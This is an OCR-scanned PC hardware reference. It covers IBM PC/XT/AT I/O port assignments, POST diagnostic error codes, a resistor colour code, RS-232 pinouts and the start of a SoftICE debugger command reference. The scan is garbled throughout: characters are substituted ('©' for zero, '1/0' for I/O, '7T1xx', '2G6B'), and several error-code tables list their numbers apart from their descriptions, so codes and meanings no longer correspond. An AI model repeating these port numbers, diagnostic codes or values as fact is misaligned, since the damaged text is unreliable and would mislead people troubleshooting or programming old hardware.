Register 4, Option select data byte 3 
Register 5, Option select data byte 4 
7 is (-CHCK) 

6 is reserved 

Register 6, subaddress extension (LSB) 
Register 7, subaddress extension (MSB) 


System I/0 channel 


Fixed disk 1 (AT) 
1 data 

1 error 

1 sector count 

1 sector number 

1 cylinder low 

1 cylinder high 

1 drive/head 

1 status 

Fixed disk 0 (AT) 
O data 

O error 

© sector count 

© sector number 


1F4 disk 0 cylinder low 
1F5 disk 0 cylinder high 
1F6 disk 0 drive/head 
1F7 disk 0 status 


% 200-20F Game Adapter (see GAME PORT or -JOYSTICK-) 


% 210-217 Expansion Card Ports (XT) 
210 Write: latch expansion bus data 
read: verify expansion bus data 
211 Write: clear wait,test latch 
Read: MSB of data address 
212 Read: LSB of data address 
213 Write: O=zenable, 1=/disable expansion unit 
214-215 Receiver Card Ports 
214 write: latch data, read: data 
215 read: MSB of address, next read: LSB of address 


21F Reserved 

% 220-26F Reserved for 1/0 channel 

% 270-27F Third parallel port (see -PARALLEL PORT-) 
278 data port 


279 status port 
27A control port 


% 280-2AF Reserved for 1/0 channel 
% 2A2-2A3 MSM58321RS clock 
% 2B0-2DF Alternate EGA, or 3270 PC video (XT, AT) 


2E0 Alternate EGA/VGA 
2E1 GPIB Adapter (AT) 


% 2E2-2E3 Data acquisition adapter (AT) 

% 2E8-2EF C0M4 non PS/2 UART (Reserved by IBM) (see -UART-) 

% 2F0-2F7 Reserved 

% 2F8-2FF  C0M2 Second Asynchronous Adapter (see UART) 
Primary Asynchronous Adapter for PCjr 

% 300-31F Prototype Experimentation Card (except PCjr) 
Periscope hardware debugger 

% 320-32F Hard Disk Controller (XT) 


320 Read from/Write to controller 

321 Read: Controller Status, Write: controller reset 

322 Write: generate controller select pulse 

323 Write: Pattern to DMA and interrupt mask register 
(see ports 0F,21,C2) 

324 disk attention/status 


% 330-33F Reserved for XT/370 

% 340-35F Reserved for 1/0 channel 

% 360-36F PC Network 

% 370-377 Floppy disk controller (except PCjr) 


372 Diskette digital output 
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374 Diskette controller status 
375 Diskette controller data 
376 Diskette controller data 
377 Diskette digital input 


% 378-37F Second Parallel Printer (see -PARALLEL PORT-) 
First Parallel Printer (see PARALLEL PORT) 
378 data port 
379 status port 
37A control port 


% 380-38F Secondary Binary Synchronous Data Link Control (SDLC) adapter 
380 On board 8255 port A, internal/external sense 
381 On board 8255 port B, external modem interface 
382 On board 8255 port C, internal control and gating 
383 On board 8255 mode register 
384 On board 8253 channel square wave generator 
385 On board 8253 channel 1 inactivity time-out 
386 On board 8253 channel 2 inactivity time-out 
387 On board 8253 mode register 
388 On board 8273 read: status; Write: Command 
389 On board 8273 write: parameter; read: response 
38A On board 8273 transmit interrupt status 
38B On board 8273 receiver interrupt status 
38C On board 8273 data 


% 390-39F Cluster Adapter 


% 3A0-3AF Primary Binary Synchronous Data Link Control (SDLC) adapter 
3A0 On board 8255 port A, internal/external sense 
3A1 On board 8255 port B, external modem interface 
3A2 On board 8255 port C, internal control and gating 
3A3 On board 8255 mode register 
3A4 On board 8253 counter 0 unused 
3A5 On board 8253 counter 1 inactivity time-outs 
3A6 On board 8253 counter 2 inactivity time-outs 
3A7 On board 8253 mode register 
3A8 On board 8251 data 
3A9 On board 8251 command/mode/status register 


% 3B0-3BF Monochrome Display Adapter (write only, see -6845-) 

3B0O port address decodes to 3B4 

3B1 port address decodes to 3B5 

3B2 port address decodes to 3B4 

3B3 port address decodes to 3B5 

3B4 6845 index register, selects which register [0-11h] 
is to be accessed through port 3B5 

3B5 6845 data register [0-11h] selected by port 3B4, 
registers 0C-0F may be read. If a read occurs without 
the adapter installed, FFh is returned. (see 6845) 

3B6 port address decodes to 3B4 

3B7 port address decodes to 3B5 

3B8 6845 Mode control register 

3B9 reserved for color select register on color adapter 

3BA status register (read only) 

3BB reserved for light pen strobe reset 


% 3BC-3BF Primary Parallel Printer Adapter (see -PARALLEL PORT-) 
3BC parallel 1, data port 
3BD parallel 1, status port 
3BE parallel 1, control port 

% 3C0-3CF EGA/VGA 
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% 


% 


% 


% 


3C0 VGA attribute and sequencer register 
3C1 Other video attributes 

3C2 EGA, VGA, CGA input status 0 
3C3 Video subsystem enable 

3C4 CGA, EGA, VGA sequencer index 
3C5 CGA, EGA, VGA sequencer 

3C6 VGA video DAC PEL mask 

3C7 VGA video DAC state 

3C8 VGA video DAC PEL address 

3C9 VGA video DAC 

3CA VGA graphics 2 position 

3CC VGA graphics 1 position 

3CD VGA feature control 

3CE VGA graphics index 

3CF Other VGA graphics 


3D0-3DF Color Graphics Monitor Adapter (ports 3D0O-3DB are 
write only, see 6845) 

3DO port address decodes to 3D4 

3D1 port address decodes to 3D5 

3D2 port address decodes to 3D4 

3D3 port address decodes to 3D5 

3D4 6845 index register, selects which register [0-11h] 
is to be accessed through port 3D5 

3D5 6845 data register [0-11h] selected by port 3D4, 
registers 0C-0F may be read. If a read occurs without 
the adapter installed, FFh is returned. (see -6845-) 

3D6 port address decodes to 3D4 

3D7 port address decodes to 3D5 

3D8 6845 Mode control register (CGA, EGA, VGA, except PCjr) 

3D9 color select palette register (CGA, EGA, VGA, see 6845) 

3DA status register (read only, see 6845, PCjr VGA access) 

3DB Clear light pen latch (any write) 

3DC Preset Light pen latch 

3DF CRT/CPU page register (PCjr only) 


3E8-3EF  COM3 non PS/2 UART (Reserved by IBM) (see -UART-) 


3F0-3F7 Floppy disk controller (except PCjr) 

3F0 Diskette controller status A 

3F1 Diskette controller status B 

3F2 controller control port 

3F4 controller status register 

3F5 data register (write 1-9 byte command, see -INT 13-) 
3F6 Diskette controller data 

3F7 Diskette digital input 


3F8-3FF  COM1 Primary Asynchronous Adapter (see -UART-) 


3220-3227 PS/2 C0M3 (see UART) 
3228-322F PS/2 COM4 (see UART) 
4220-4227 PS/2 COM5 (see UART) 
4228-422F PS/2 COM6 (see UART) 
5220-5227 PS/2 C0M7 (see UART) 
5228-522F PS/2 C0M8 (see UART) 


- many cards designed for the ISA -BUS- only uses the lower 10 bits 
of the port address but some ISA adapters use addresses beyond 
3FF. Any address that matches in the lower 10 bits will decode 
to the same card. It is up to the adapters to resolve or ignore 
the high bits of the port addresses. An example would be the 
Cluster adapter that has a port address of 390h. The second 
cluster adapter has a port address of 790h which resolves to 
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the same port address with the cards determining which one 
actually gets the data. 
:diagnostic codes:POST errors 


ADIAGS 


% Code 


% 1Xx 


% 2XX 


% 3XX 


% 4XX 


408 
416 
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IBM PC Diagnostic Error Codes 
Description (Diagnostic Error Codes) 


undetermined problem errors 

power supply errors 

battery error (PS/2) 

configuration changed but no adaptors changed or CRC error 
memory size during POST does not match -CMOS- RAM 

card Id's in CMOS do not match system 


System Board Errors 

system board failed 

BIOS ROM checksum error (PC, XT), Timer (AT) 

BASIC ROM checksum error (PC, XT), Timer interrupt (AT) 
interrupt controller (PC, XT), Protected mode (AT) 
timer (PC,XT), Last -8042- command not accepted (AT) 
converting logic test failure 

adapter card or math coprocessor (NMI) 

timer bus test 

DMA test error 

system board memory error (PS/2) 

adapter memory 

system unit adapter failure 

system unit and adapter card unit failure (PS/1) 
unexpected hardware interrupt 

cassette wrap test failed 

real-time clock, CMOS RAM or battery 

real-time clock 

system options error, battery failure 

CMOS RAM configuration error 

CMOS time and date not set 

system memory configuration is incorrect 

adapter added/removed 

user indicated configuration not correct 


RAM Errors 

memory test error 

memory address error (Line error 0 - 15) 
memory address error (Line error 16 - 23) 
motherboard memory 


Keyboard Errors 

keyboard did not respond to software reset or a stuck 
(number preceding 301 is scan code for stuck key) 

user indicated keyboard error or AT system unit is locked 
keyboard or system board error 

keyboard or system board error; CMOS does not match system 
replace keyboard 

replace keyboard interface cable 

replace enhancement card or cable 

keyboard (replace keyboard) 

interface cable (replace cable) 

enhancement card or cable (replace) 


Monochrome Monitor Errors 

monochrome memory test, horizontal sync frequency 
test, or video test failed 

user indicated display attributes failure 

user indicated character set failure 


% 


% 


% 


% 


% 


% 
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424 
432 


BXxx 
501 


508 
516 
524 
532 
540 
548 
556 
564 


6XxXX 
601 
602 
603 
606 
607 
608 
610 
611 
612 
613 
614 
621 
622 
623 
624 
625 
626 
627 
628 


TXX 
701 


XX 
901 


10xx 
1001 


11Xx 
1101 
1110 
1111 
1112 
1113 
1114 
1115 
1116 
1117 
1118 
1119 
1120 
1121 
1122 
1123 
1124 
1125 


user indicated 80x25 mode failure 
parallel port test failed (monochrome adapter) 


Color Monitor Errors 


CGA memory test failed, horizontal sync frequency test, or 


video test failed 

user indicated display attribute failure 
user indicated character set failure 

user indicated 80x25 mode failure 

user indicated 40x25 mode failure 

user indicated 320x200 graphics mode failure 
user indicated 640x200 graphics mode failure 
light pen test 

user indicated screen paging test 


Diskette Drive/Adapter Errors 

diskette power on diagnostics test failed 
diskette test failed (boot record not valid) 
diskette size error 

diskette verify function failed 

write protected diskette 

bad command diskette status returned 
diskette initialization failed 

time-out - diskette status returned 

bad NEC -FDC- - diskette status returned 
bad DMA - diskette status returned 

DMA boundary error 

bad seek - diskette status returned 

bad CRC - diskette status returned 

record not found - diskette status returned 
bad address mark - diskette status returned 
bad NEC seek - diskette status returned 
diskette data compare error 

diskette change line error 

diskette removed 


8087 Math Coprocessor 
coprocessor test failure 


Parallel Printer Adapter Errors 
parallel printer adapter test failed 


Alternate Parallel Printer Adapter 
alternate printer adapter test failure 


Asynchronous Communications Adapter Errors 
asynchronous communications adapter test failed 
modem status register not clear 

ring-indicate 

trailing edge ring-indicate 

receive and delta receive line signal detect 
receive line signal detect 

delta receive line signal detect 

line control register: all bits cannot be set 
line control register: all bits cannot be reset 
transmit holding and/or shift register stuck on 
data ready stuck on 

interrupt enable register: all bits cannot be set 
interrupt enable register: all bits cannot be reset 
interrupt pending stuck on 

interrupt ID register stuck on 

modem control register: all bits cannot be set 
modem control register: all bits cannot be reset 


1126 modem status register: all bits cannot be set 
1127 modem status register: all bits cannot be reset 
1128 interrupt ID 

1129 cannot force overrun error 

1130 no modem status interrupt 

1131 invalid interrupt pending 

1132 no data ready 

1133 no data available interrupt 

1134 no transmit holding interrupt 

1135 no interrupts 

1136 no received line status interrupt 
1137 no receive data available 

1138 transmit holding register not empty 
1139 no modem status interrupt 

1140 transmit holding register not empty 
1141 no interrupts 

1142 no IRQ4 interrupt 

1143 no IRQ3 interrupt 

1144 no data transferred 

1145 maximum baud rate 

1146 minimum baud rate 

1148 time-out error 

1149 invalid data returned 

1150 modem status register error 

1151 no DSR and delta DSR 

1152 no DSR 

1153 no delta DSR 

1154 modem status register not clear 
1155 no CTS and delta CTS 

1156 no CTS 

1157 no delta CTS 


% 12xx Alternate Asynchronous Communications Adapter 
1200-1257 same as 1100-1157 


% 13xx Game Control Adapter Errors 
1301 game control adapter test failed 
1302 joystick test failed 
1380 audio card and joystick (PS/1) 


% 14xx Printer Errors 
1401 printer test failed 
1404 matrix printer failed 


% 15xx SDLC Communications Adapter Errors 
1501 adapter test failure 
1510 8255 port b failure 
1511 8255 port a failure 
1512 8255 port c failure 
1513 8253 timer 1 did not reach terminal count 
1514 8253 timer 1 stuck on 
1515 8253 timer 0 did not reach terminal count 
1516 8253 timer 0 stuck on 
1517 8253 timer 2 did not reach terminal count 
1518 8253 timer 2 stuck on 
1519 8273 port b error 
1520 8273 port a error 
1521 8273 command/read time-out 
1522 interrupt level 4 failure 
1523 ring Indicate stuck on 
1524 receive clock stuck on 
1525 transmit clock stuck on 
1526 test indicate stuck on 
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1527 
1528 
1529 
1530 
1531 
1532 
1533 
1534 
1535 
1536 
1537 
1538 
1539 
1540 
1541 
1542 
1547 
1548 
1549 


% 16xx 


% 17Xx 
1701 
1702 
1703 
1704 
1705 
1706 
1707 
1708 
1709 
1710 
1711 
1712 
1713 
1714 
1780 
1781 
1782 
1790 
1791 


% 18xx 
1801 
1810 
1811 
1812 
1813 
1814 
1815 
1816 
1817 
1818 
1819 
1820 
1821 


% 19xx 
% 20xx 
2010 
2011 
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ring indicate not on 
receive clock not on 
transmit clock not on 
test indicate not on 

DSR not on 

CD not on 

CTS not on 

DSR stuck on 

CD stuck on 

CTS stuck on 

level 3 interrupt failure 
receive interrupt results error 
wrap data compare error 
DMA channel 1 error 

DMA channel 1 error 


error in 8273 error checking or status reporting 


stray interrupt level 4 
stray interrupt level 3 
interrupt presentation sequence time-out 


Display Emulation Errors (327x, 5520, 525x) 


Fixed Disk Errors 

post error 

adapter error 

drive error (seek) 
adapter or drive error 
no record found 

write fault error 
track 0 error 

head select error 
defective error check 
read buffer overrun 
bad address mark 
undetermined error 
data compare error 
drive not ready 

disk 0 failure 

disk 1 failure 

disk controller failure 
fixed disk 0 error 
fixed disk 1 error 


1/0 Expansion Unit Errors 

I/0 expansion unit POST error 
enable/disable failure 

extender card wrap test failed (disabled) 
high order address lines failure (disabled) 
wait state failure (disabled) 
enable/disable could not be set on 

wait state failure (enabled) 

extender card wrap test failed (enabled) 
high order address lines failure (enabled) 
disable not functioning 

wait request switch not set correctly 
receiver card wrap test failure 

receiver high order address lines failure 


3270 PC Attachment Card Errors 
Bisync Communications Adapter Errors 


8255 port a failure 
8255 port b failure 


% 


% 


% 


% 


% 


% 


% 
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2012 
2013 
2014 
2016 
2017 
2018 
2019 
2020 
2021 
2022 
2023 
2024 
2025 
2026 
2027 
2028 
2029 
2030 
2031 
2033 
2034 
2035 
2036 
2037 
2038 
2039 
2040 
2041 
2042 
2043 
2044 
2045 
2046 
2047 
2048 
2049 
2050 
2051 
2052 


21XXx 


8255 port c failure 

8253 timer 1 did not reach terminal count 
8253 timer 1 stuck on 

8253 timer 2 didn't reach terminal count or timer 2 stuck on 
8251 DSR failed to come on 

8251 CTS not sensed 

8251 DSR stuck on 

8251 CTS stuck on 

8251 hardware reset failed 

8251 software reset failed 

8251 software error reset failed 

8251 transmit ready did not come on 

8251 receive ready did not come on 

8251 could not force "overrun" error status 
interrupt failure, no timer interrupt 
transmit interrupt, card or planar failure 
transmit interrupt, card failure 

receive interrupt, card or planar failure 
receive interrupt, card failure 

ring indicate stuck on 

receive clock stuck on 

transmit clock stuck on 

test indicate stuck on 

ring indicate stuck on 

receive clock not on 

transmit clock not on 

test indicate not on 

DSR not on 

CD not on 

CTS not on 

DSR stuck on 

CD stuck on 

CTS stuck on 

unexpected transmit interrupt 

unexpected receive interrupt 

transmit data did not equal receive data 
8251 detected overrun error 

lost DSR during data wrap 

receive time-out during data wrap 


Alternate Bisync Communications Adapter Errors 


2100-2152 same as 2000-2052 


22XXx 


24XX 
2401 
2408 
2416 
2424 
2432 
2440 
2448 
2456 
2464 


2501 


28xx 


29xx 


3OxX 


Cluster Adapter Errors 


EGA Errors 

adapter test failure 

user-indicated display attributes 
user-indicated character set 
user-indicated 80x25 mode 
user-indicated 40x25 mode 
user-indicated 320x200 graphics mode 
user-indicated 640x200 graphics mode 
light pen test 

user-indicated screen paging test 


EGA Display Error 
3278/79 Emulator Adapter (PC, XT) 
Color Matrix Printer Errors 


Local Area Network Adapter 


% 31xx Alternate Local Area Network Adapter 


% 33xx Compact Printer Errors 

% 36xx IEEE 488 Adapter 

% 37xx Reserved for Future Use 

% 38xx Data Acquisition Adapter 

% 39xx  PGA Display and/or Adapter 
% 48xx Internal Modem 

% 49xx Alternate Internal Modem 

% 7T1xx Voice Communications Adapter 
% 73xx 3.5 Inch Diskette Drive 


7301 diskette drive/adapter test failure 
7306 diskette change line error 
7307 write-protected diskette 
7308 bad command 

7310 track zero error 

7311 timeout 

7312 bad NEC7313 bad DMA 

7314 DMA boundary error 

7315 bad index 

7316 speed error 

7321 bad seek 

7322. bad CRC 

7323 record not found 

7324 bad address mark 

7325. bad NEC seek 


% 86xx PS/1 Mouse Error 


- all error codes for the diagnostic and advanced diagnostic 
packages for the PC, XT and AT are represented with the device 
number followed by two digits other than 00. The device number 
plus 00 represents successful completion of the test. 


:resistor values 
AResistor Color Code Chart 


% Color Digit Multiplier 
Black © 1 
Brown 1 10 
Red 2 100 Gold fi 5% tolerance 
Orange 3 1,000 Silver fi10% tolerance 
Yellow 4 10, 000 
Green 5 100, 000 
Blue 6 1,000, 000 
Violet 7 10,000, 000 
Gray 8 100, 000, 000 
White 9 1,000, 000, 000 
% 010000°00+00200°0000î, 
% A A 
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3 3 3 AAAAAAAAAAA tolerance (gold or silver) 


3 8 _AAAAAAAAAAAAA Ohm value multiplier 


AAAAAAAAKAKAAAAAAA first 2 digits of Ohm value 


:RS232 pins:serial ports 


NRS232 


% 
% 


% 


Communication Configuration 
IBM PC IBM AT 
Pin 25-Pin Signal (DTE) Pin 9-Pin Signal (DTE) 
1 Chassis Ground (GND) 1 Carrier Detect (CD) 
2 Transmit Data (TD) 2 Receive Data (RD) 
3 Receive Data (RD) 3 Transmit Data (TD) 
4 Request to Send (RTS) 4 Data Terminal Ready (DTR) 
5 Clear to Send (CTS) 5 Signal Ground (SG) 
6 Data Set Ready (DSR) 6 Data Set Ready (DSR) 
7 Signal Ground (SG) 7 Request to Send (RTS) 
8 Carrier Detect (CD) 8 Clear to Send (CTS) 
9-19 (not used) 9 Ring Indicator (RI) 


20 Data Terminal Ready (DTR) 
22 Ring Indicator (RI) 


There are two general cable configurations used with the RS-232C 
Communications Standard: 


Data Terminal Equipment (DTE): IBM PC's, printers, plotters, etc 
Data Communication Equipment (DCE): modems, multiplexors, etc 


DCE to DTE requires all lines run straight through 
DTE to DTE usually requires swapping of the following lines 


RD and TD RD and TD 
RTS and CTS or RTS,CTS and DCD 
DTR and DSR DCD and RTS,CTS 


Signal Functions 


GND Ground protective safety ground 

TD Transmit Data DTE output data 

RD Receive Data DTE input data 

RTS Request To Send DTE output, DTE would like to transmit 
CTS Clear To Send DTE input, DCE is ready to transmit 
DSR Data Set Ready DTE input, DCE is ready to communicate 
SG Signal Ground provides a Zero reference voltage 


DCD Data Carrier Detect DTE input, data link established, also 


known as Receive Line Signal Detect (RLSD) 


DTR Data Terminal Ready DTE output, device ready 
RI Ring Indicator DTE input, announces incoming call 


RTS/CTS is used for half duplex line turn around 

in half duplex DCD is asserted only by the receiving device 

full duplex modems tie CTS & DCD together (no CTS/RTS handshaking) 
most modems require DTR to be present to respond to commands 
maximum voltages are between -15 volts and +15 volts 

binary outputs are between +5 to +15 volts and -5 to -15 volts 
binary inputs are between +3 to +15 volts and -3 to -15 volts 
input voltages between -3 to +3 are undefined while output voltages 
between -5 and +5 are undefined 

positive voltages indicate ON or SPACE, negative voltages indicate 
OFF or MARK 
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@softICE Command Reference 


A, Windows 3.1, Windows 95, Windows NT WindowControl 
ALocate the current instruction in the Code window. 


%Syntax 


%Use 

When the Code window is visible, the . (Dot) command makes the instruction at 
the current 

CS:EIP visible and highlights it. 


%For Windows 95 and Windows NT 

The command switches contexts back to the original context that SoftICE popped 
up in. 
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A? WINDOWS 3.1, WINDOWS 95, WINDOWS NT MISCELLANEOUS 
AEvaluate an expression. 


%Syntax 
%For Windows 3.1 
? [command | expression] 


%For Windows 95 and Windows NT 
? expression 


%Use 
%For Windows 3.1 

Under Windows 3.1, the parameter you supply to the ? command determines whether 
help is 

displayed or an expression is evaluated. If you specify a command, ? displays 
detailed 

information about the command, including the command syntax and an example. If 
you 

specify an expression, the expression is evaluated, and the result is displayed 
in hexadecimal, 

decimal, signed decimal (only if < 0), and ASCII. 


%For Windows 95 and Windows NT 

Under Windows 95 and Windows NT, the ? command only evaluates expressions. 
(Refer to 

H on page 92 for information about getting help under Windows 95 and Windows 
NT.) 

To evaluate an expression enter the ? command followed by the expression you 
want to 

evaluate. SoftICE displays the result in hexadecimal, decimal, signed decimal 
(only if < 0), 

and ASCII. 


%Example 

The following command displays the hexadecimal, decimal, and ASCII 
representations of the 

value of the expression 10*4+3. 

.12 10*4+3 

00000043 0000000067 "C" 

See Also -H- 


:A 
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AA Windows 3.1, Windows 95, Windows NT Miscellaneous 
AAssemble code. 


%Syntax 
A [address] 


%Use 

Use the SoftICE assembler to assemble instructions directly into memory. The 
assembler 

supports the standard Intel 80x86 instruction set. 


If you do not specify the address, assembly occurs at the last address where 
instructions were 

assembled. If you have not entered the A command before and did not specify the 
address, the 

current CS:EIP address is used. 


The A command enters the SoftICE interactive assembler. An address displays as 
a prompt for 

each assembly line. After you type an assembly language instruction and press 
Enter, the 

instructions assemble into memory at the specified address. Type instructions 
in the standard 

Intel format. To exit assembler mode, press Enter at an address prompt. 


If the address range in which you are assembling instructions is visible in the 
Code window, 
the instructions change interactively as you assemble. 


The SoftICE assembler supports the following instruction sets: 

For Windows 3.1: 386, Floating Point 

For Windows 95 and Windows NT: 386, 486, Pentium, Pentium Pro, all 
corresponding 

numeric coprocessor instruction sets, and MMX instruction sets 


SoftICE also supports the following special syntax: 

Enter USE16 or USE32 on a separate line to assemble subsequent instructions 
as 16-bit 

or 32-bit, respectively. If you do not specify USE16 or USE32, the default is 
the same as 

the mode of the current CS register. 

Mnemonic followed by a list of bytes and/or quoted strings separated by 
spaces or 

commas. 

RETF mnemonic represents a far return. 

Use WORD PTR, BYTE PTR, DWORD PTR, and FWORD PTR to determine data 

size, if there is no register argument. 

Example: MOV BYTE PTR ES:[1234.],1 

. Use FAR and NEAR to explicitly assemble far and near jumps and calls. If you 

do not 

specify either, the default is NEAR. 

Place operands referring to memory locations in square brackets. 

Example: MOV AX, [1234] 


Any changes you make to 32-bit code are © sticky.'' This means they remain in 
place even if 

you load or reload the module you change. To remove the changes, do one of the 
following: 

restart Windows NT, flush the memory image from the cache, or modify the 
module. 


%Example 
When you use the following command: 
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A CS:1234 

the assembler prompts you for assembly instructions. Enter all instructions and 
press Enter at 

the address prompt. The assembler assembles the instructions beginning at 
offset 1234h 

within the current code segment. 


:ACTION 
AACTION Windows 3.1 ModeControl 
ASet action after breakpoint is reached. 


%Syntax 

ACTION [nmi|int1|int3|here|interrupt-number |debugger-name] 

interrupt-number: Valid interrupt number between 0 and 5Fh. 

debugger-name: Module name of the Windows application debugger to gain control 
of 

on a SoftICE breakpoint. 


%Use 

The ACTION command determines where to give control when breakpoint conditions 
are 

met. In most cases, you can use ACTION to pass control to an application 
debugger you are 

using in conjunction with SoftICE. Use the HERE parameter to return to SoftICE 
when 

break conditions have been met. Use the NMI, INT1, and INT3 parameters as 
alternatives 

for activating DOS debuggers when break conditions are met. Use debugger-name 
to activate 

Windows debuggers. To find the module name of the debugger, use the MOD 
command. 


If you specify debugger-name, an INT © triggers the Windows debugger. SoftICE 
ignores 

breakpoints that the Windows debugger causes if the debugger accesses memory 
covered by a 

memory location or range breakpoint. when SoftICE passes control to the Windows 
debugger with an INT 0, the Windows debugger responds as if a divide overflow 
occurred 

and displays a message. Ignore this message because the INT 0 was not caused by 
an actual 

divide overflow. 


Note: The ACTION command is obsolete under Windows 95 and Windows NT. 


%Example 

When using SoftICE with the following products, use the corresponding command: 
Product SoftICE Command 

CodeView for DOS ACTION nmi 


Note: SoftICE generates a non-maskable interrupt when 
break conditions are met. This gives control to CodeView for DOS. 


CodeView for Windows ACTION cvw 
Borland's Turbo Debugger for Windows ACTION tdw 
Multiscope's Debugger for Windows ACTION rtd 
:ADDR 


AADDR Windows 95 SystemInformation 
ADisplay or switch to address context. 


%Syntax 
ADDR [context-handle | process-name] 
context-handle: Address context handle. 
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process-name: Name of a process. 


%Use 

To be able to view the private address space for an application process, set 
the current address 

context within SoftICE to that of the application by providing an address 
context-handle or 

the process-name as the first parameter to the ADDR command. To view 
information on all 

currently active contexts, use ADDR with no parameters. The first address 
context listed is the 

current address context. 

To use ADDR with 

Windows NT, refer to -ADDR (NT)- 


For each address context, SoftICE prints the following information: 
address context handle 
address of the private page table entry array (PGTPTR) of the context 
number of entries that are valid in the PGTPTR array 
starting and ending linear addresses represented by the context 

. address of the mutex object used to control access to the context's page 

tables 
name of the process that owns the context. 

When you use the ADDR command with an address context parameter, SoftICE 

switches 

address contexts the same way as Windows does. 


when switching address contexts, Windows 95 copies all entries in the new 
context's 

PGTPTR array to the page directory (pointed at by the CR3 register). A context 
switch 

affects the addressing of the lower 2G6B of memory from linear address 0 to 
7FFFFFFFh. 

Each entry in a PGTPTR array is a page directory entry which points at a page 
table that 

represents 4MB of memory. There can be a maximum of 512 entries in the PGTPTR 
array to 

represent the full 2GB. If there are less than 512 entries in the array, the 
rest of the entries in 

the page directory are set to invalid values. 


when running more than one instance of an application, the same owner name 
appears in the 

address context list more than once. If you specify an owner name as a 
parameter, SoftICE 

always selects the first address context with a matching name in the list. To 
switch to the 

address context of a second or third instance of an application, provide an 
address context - 

handle to the ADDR command. 


Note: If SoftICE pops up when the System VM (VM 1) is not the current VM, it is 
possible 

for context owner information to be paged out and unavailable. In these cases 
no 

owner information displays. 


%Output 

For each context or process, the following information displays. 
%Handle 

Address of the context control block. This is the handle that is passed 
in VxD calls that require a context handle. 
%Pgtptr 
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Address of an array of page table addresses. Each entry in the array 
represents a page table pointer. When address contexts switch, the 
appropriate location in the page directory receives a copy of this array. 
%Tables 

Number of entries in the PGTPTR array. Not all entries contain valid 
page directory entries. This is only the number of entries reserved. 
%MinAddr 

Minimum linear address of the address context. 
%MaxAddr 

Maximum address of the address context. 
%Mutex 

Mutex handle used when VMM manipulates the page tables for the context. 
%Owner 

Name of the first process that uses this address context. 


%Example 

The following command displays all currently active address contexts. The 
context on the top 

line of the display is the context that SoftICE popped up in. To switch back to 
this at any 

time, use the . (DOT) command. when displaying information on all contexts, one 
line is 

highlighted, indicating the current context within SoftICE. When displaying 
data or 

disassembling code, the highlighted context is the one you see. 

. :ADDR 

Handle PGTPTR Tables Min Addr Max Addr Mutex Owner 

C1068D00 C106CDOC 0200 00400000 7FFFFO00 COFEC770 WINWORD 

C104E214 C1068068 0200 00400000 7FFFF000 C1063DBC Rund1132 

C105AC9C C0FE5330 0002 00400000 7FFFF000 COFE5900 QUICKRES 

C1055EF8 C105CE8C 0200 00400000 7FFFF000 C105C5EC Ibserver 

C1056D10 C10571D4 0200 00400000 7FFFF000 C1056D44 Mprexe 

C10D900C C10D9024 0002 00400000 7FFFF000 C10D9050 (current context) 
C10493E8 C10555FC 0004 00400000 7FFFF000 COFE6460 KERNEL32 

C1055808 C105650C 0200 00400000 7FFFF000 C105583C MSGSRV32 

C10593CC C1059B78 0200 00400000 7FFFF000 C105908C Explorer 

C106AE70 C106DD10 0200 00400000 7FFFF000 C10586F0 Exchng32 

C106ABC4 C106ED04 0200 00400000 7FFFF000 C106CA4C Mapisp32 

Handle PGTPTR Tables Min Addr Max Addr Mutex Owner 


:ADDR (NT) 
AADDR Windows NT SystemInformation 
ADisplay or switch to an address context. 


%Syntax 
ADDR [process-name | process-id | KPEB] 
KPEB: Kernel Process Environment Block. 


%Use 

Use the ADDR command to both display and change address contexts within SoftICE 
so that 

process-specific data and code can be viewed. Using ADDR with no parameters 
displays a list 

of all address contexts. 


If you specify a parameter, SoftICE switches to the address context belonging 
to the process 
with that name, identifier, or process control block address. 


If you switch to an address context that contains an LDT, SoftICE sets up the 
LDT with the 
correct base and limit. 
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All commands that use an LDT only work when the current SoftICE context 
contains an 
LDT. LDTs are never global under Windows NT. 


Under low memory conditions, Windows NT starts swapping data to disk, including 
inactive 

processes, parts of the page directory, and page tables. When this occurs, 
SoftICE may not be 

able obtain the information necessary to switch to contexts that rely on this 
information. 

SoftICE indicates this by displaying the message swapped in the CR3 field of 
the process or 

displaying an error message if an attempt is made to switch to the context of 
the process. 

when displaying information about all contexts, one line is highlighted, 
indicating the 

current context within SoftICE. When displaying data or disassembling code, the 
highlighted 

context is the one you see. 


An * (asterisk) precedes one line of the display, indicating the process that 
was active when 
SoftICE popped up. Use the . (DOT) command to switch contexts back to this 
context at any 
time. 
%Output 
For each context or process, the following information is shown: 
%CR3 
Physical address of the page directory that is placed into the CR3 
register on a process switch to the process. 
%LDT 
If the process has an LDT, this field has the linear base address of the 
LDT and the limit field for the LDT selector. All Windows NT 
processes that have an LDT use the same LDT selector. For process 
switches, Windows NT sets the base and limit fields of this selector. 
%KPEB 
Linear address of the Kernel Process Environment Block for the 
process. 
%PID 
Process ID. Each process has a unique ID. 
%NAME 
Name of the process. 


%Example 

The following example shows the ADDR command being used without parameters to 
display 

all the existing contexts. 


: ADDR 

PROC 

CR3 LDT Base:Limit KPEB PID NAME 
00030000 FD8EA920 0002 System 
011FB000 FD8CD880 0013 smss 
017A5000 FD8BFB60 0016 csrss 
01B69000 FD8BADEO 001B winlogon 
01CF3000 FD8B6B40 0027 services 
01D37000 FD8B5760 0029 lsass 
00FFA000 FDBA8BAEO 0040 spoolss 
009A5000 FD89F7E0O 002B nddeagnt 
00AA5000 FD89CB40 004A progman 
006D2000 E115F000:FFEF FD899DEO 0054 ntvdm 
00837000 FD896D80 0059 CLOCK 
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00C8C000 FD89C020 0046 scm 
00387000 FD89E5E0 004E 4NT 
*0121C000 E1172000:0187 FD88CCA0O 0037 ntvdm 
00030000 8013DD50 0000 Idle 


:ALTKEY 
AALTKEY Windows 3.1, Windows 95, Windows NT Customization 
ASet an alternate key sequence to invoke SoftICE. 


%Syntax 
ALTKEY [Alt letter | Ctrl letter] 
letter Any letter (A through Z). 


%Use 
Use the ALTKEY command to change the key sequence (default key Ctrl-D) for 
popping up 


SoftICE. Occasionally another program may conflict with the hot key sequence. 
You can 

change the key sequence to either of the following sequences: 

Ctrl + letter 

Or 

Alt + letter 

If you do not specify a parameter, the current hot key sequence displays. 

To change the hot key sequence every time you run SoftICE, Configure SoftICE in 
the 

SoftICE Loader to place the ALTKEY command in the SoftICE initialization 
string. 


%Example 

To specify that the key sequence Alt-Z pop up the SoftICE screen, use the 
following 

command: 

ALTKEY alt z 


:ALTSCR 
AALTSCR Windows 3.1, Windows 95, Windows NT WindowControl 
ADisplay SoftICE on an alternate screen. 


%Syntax 
ALTSCR [on | off] 


%Use 

Use the ALTSCR command to redirect the SoftICE output from the default screen 
